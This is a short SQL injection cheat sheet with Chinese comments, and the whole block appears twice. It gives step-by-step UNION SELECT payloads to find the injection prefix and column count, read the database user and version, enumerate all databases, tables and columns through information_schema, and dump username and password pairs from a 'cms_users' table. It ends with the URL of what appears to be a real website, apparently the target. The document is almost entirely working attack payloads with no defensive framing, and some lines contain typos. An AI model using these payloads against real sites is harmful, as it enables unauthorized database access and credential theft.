//判断前缀与后缀
数字与字符型 'order by 1# 'and 's' IN ('swords')#
数字型 order by 1# //前缀为空,后缀为#
数字与字符 ')order by 1# ')&& 's' IN ('swords')#
//很少见 ")order by 1#
//确定字段数'order by $#后,id=-1' #进行U或E查询
//若有3个字段,确定显示位
//查看基本信息,确认是否是root
id=-1'union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5%23
//!root权限,爆出所有数据库名
id=-1'union select 1,2,3,unhex(hex(group_concat(schema_name))),5 from information_schema.schemata#
//查询某个数据库下所有表,当前数据库用database(),0x7068706161是phpaa的hex编码
union select 1,2,3,unhex(hex(group_concat(table_name))),5 from information_schema.tables where table_schema=0x7068706161,
//查询某个表下的所有字段
union select 1,2,unhex(hex(group_concat(column_name))),4 from information_schema.columns where
table_name=0x636D735F7573657273
//查询数据
union select 1,2,group_concat(DISTINCT+user,0x3a,password)12,13,14,15 from phhaa.cms_users
http://m.yicp.com/news/newslist.php?categoryId=15
数字与字符型 'order by 1# 'and 's' IN ('swords')#
数字型 order by 1# //前缀为空,后缀为#
数字与字符 ')order by 1# ')&& 's' IN ('swords')#
//很少见 ")order by 1#
//确定字段数'order by $#后,id=-1' #进行U或E查询
//若有3个字段,确定显示位
//查看基本信息,确认是否是root
id=-1'union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5%23
//!root权限,爆出所有数据库名
id=-1'union select 1,2,3,unhex(hex(group_concat(schema_name))),5 from information_schema.schemata#
//查询某个数据库下所有表,当前数据库用database(),0x7068706161是phpaa的hex编码
union select 1,2,3,unhex(hex(group_concat(table_name))),5 from information_schema.tables where table_schema=0x7068706161,
//查询某个表下的所有字段
union select 1,2,unhex(hex(group_concat(column_name))),4 from information_schema.columns where
table_name=0x636D735F7573657273
//查询数据
union select 1,2,group_concat(DISTINCT+user,0x3a,password)12,13,14,15 from phhaa.cms_users
http://m.yicp.com/news/newslist.php?categoryId=15